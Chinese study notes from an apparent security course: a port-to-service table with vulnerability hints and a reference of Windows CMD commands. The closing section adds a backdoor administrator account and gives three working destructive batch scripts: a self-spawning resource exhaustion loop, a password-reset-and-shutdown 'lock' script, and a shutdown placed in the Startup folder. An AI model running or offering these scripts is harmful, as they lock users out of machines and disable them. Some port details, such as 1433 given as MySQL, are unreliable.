Windows2
声明!
学习视频来自B站up主 泷羽sec 有兴趣的师傅可以关注一下,如涉及侵权马上删除文章,笔记只是方便各位师傅的学习和探讨,文章所提到的网站以及内容,只做学习交流,其他均与本人以及泷羽sec团队无关,切勿触碰法律底线,否则后果自负!!!!有兴趣的小伙伴可以点击下面连接进入b站主页B站泷羽sec
这篇可以看做是CMD常见命令的补充篇CMD常见指令,感兴趣的小伙伴可以看看
(前置知识)常见端口即对应服务
| 端口 | 服务 |
|---|---|
| 21 | ftp |
| 23 | tenlnet |
| 80 | Web服务 |
| 80-89 | 可能是web |
| 443 | ssl心脏滴血漏洞以及一些web漏洞测试 |
| 445 | Smb |
| 1433 | Mysql |
| 1521 | Oracle |
| 2082/2083 | Cpanel 主机管理系统登录(国外用的居多) |
| 2222 | da虚拟主机管理系统登陆(国外居多) |
| 3128 | Squid代理默认端口-漫游内网 |
| 3306 | mysql |
| 3312/3311 | Kangle 主机管理系统登录 |
| 3389 | 远程桌面 |
| 5432 | PostgreSQL |
| 5900 | Vnc |
| 6379 | Redis(未授权) |
| 7001/7002 | Weblogic 默认弱口令 反序列化 |
| 7778 | Kloxo 主机控制面板登录 |
| 8000-9090 | 一些常见的web端口,有的运维会把管理后台开在这些端口上 |
| 8080 | Tomcat 、wdcp主机管理系统,弱口令 |
| 8080,8089,9090 | Jboss |
| 8083 | Vestacp 主机管理系统(国外较多) |
| 8649 | Ganglia |
| 8888 | 宝塔 主机默认管理端口 |
| 11211 | Memcache 未授权访问 |
| 27017/27018 | Mongoldb未授权访问 |
| 28017 | Mongoldb 统计系统页面 |
| 10000 | Virtuamin/webmin服务器虚拟主机管理系统 |
常用的CMD命令
echo——输出
echo /? #查看帮助文档
echo string #输出string的内容
echo string > **.txt #将输出内容写入到**.txt
echo string >> **.txt #将输出内容追加到**.txt
dir——展示当前目录
直接输入dir即可获取当前目录信息
C:\Users\Administrator>dir
驱动器 C 中的卷没有标签。
卷的序列号是 60E8-8EA6
C:\Users\Administrator 的目录
2024/11/08 19:52 <DIR> .
2024/11/08 19:52 <DIR> ..
2024/11/08 19:52 <DIR> Contacts
2024/11/08 19:52 <DIR> Desktop
2024/11/08 19:52 <DIR> Documents
2024/11/08 19:52 <DIR> Downloads
2024/11/08 19:52 <DIR> Favorites
2024/11/08 19:52 <DIR> Links
2024/11/08 19:52 <DIR> Music
2024/11/08 19:52 <DIR> OneDrive
2024/11/08 19:52 <DIR> Pictures
2024/11/08 19:52 <DIR> Saved Games
2024/11/08 19:52 <DIR> Searches
2024/11/08 19:52 <DIR> Videos
0 个文件 0 字节
14 个目录 245,227,241,472 可用字节
d: c: 和cd ——切换目录
d: #切换到d盘
c: #切换到C盘
cd /文件夹名称 # 切换到文件夹下
cd .. #切换到上级目录
tree——文件树状图
tree /? #查看帮助文档
tree /f #查看每个文件夹的名称
tree /a #使用ascll字符,且不使用扩展字符
md——创建和删除
Mkdir和rmdir
md kkk #创建kkk的文件夹
rd kkk # 删除kkk的文件夹
ipconfig ——显示ip地址
Ipconfig 不用多说啦吧,在linux系统中为ifconfig
cls——清屏
copy——复制拼接文件
copy /? #查看帮助文档
copy **.txt ../**.txt #将**.txt复制到上级目录
copy 1.txt desktop\2.txt #将1.txt复制到桌面并命名2.txt
copy 1.txt+2.txt 3.txt #将1.txt和2.txt拼接为3.txt
Move——移动文件
move ..\1.txt 2.txt # 将上级目录的1.txt移到这级目录然后命名为2.txt
ren——重命名
ren 1.txt 2.txt #将1.txt重命名为2.txt
del——删除
del 1.txt #永久删除1.txt,不会进入回收站
ping——检测ip 畅通性
ping ****
type ——查看文件内容
type 1.txt # 在不点击1.txt的情况下产看1.txt的内容
reg——注册表
nslookup ——探测域名信息
nslookup -d 域名 # 产看域名的历史解析记录
nslookup 域名 # 产看域名解析
find——查找
find /? #查看参数
find "a" 1.txt #在1.txt中查询带a
find /n "a" 1.txt # 查找a参数的字段并排序行号
type 1.txt | find "a" #产看1.txt并输出带有a参数的字段
tasklist/taskkill——任务列表
tasklist #查看任务列表 显示出当前的进程名称等信息
taskkill /? #查看帮助文档
taskkill /pid *** #通过tasklist可以查看pid
taskkill /f #遇到杀不死加/f即可
ver/winver——查看版本
直接输入就好,winvar会弹出一个窗口显示
start——开启命令
logoff——注销
shutdown——关机
arp
Arp自己的IP和物理机的映射关系表
arp /? # 查看帮助文档
arp -a # 发现同一网络还有哪些机器
at——定时任务
net——服务
net stop/start 服务名 # 停止/开启服务
net user #查看当前用户
net user admin 123 /add #添加用户名admin,密码123的用户
net user admin # 查看admin用户权限
net user administrator #查看管理员用户权限
net localgroup Administrators admin /add #提权
net user admin #查看admin用户权限
net user admin /delete # 删除用户
编写资源耗尽病毒bat
echo start cmd > 1.txt
echo %0 >>1.txt
ren 1.txt 1.bat
锁机病毒
echo net user administrator 123456 > c:\windows\Temp\1.bat
echo shutdown /s /t 0 >> c:\windows\Temp\1.bat
无限重启病毒
echo shutdown /s /t 0 > c:\windows\Temp\2.bat
copy c:\windows\Temp\2.bat "C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start\Menu\Programs\Startup\"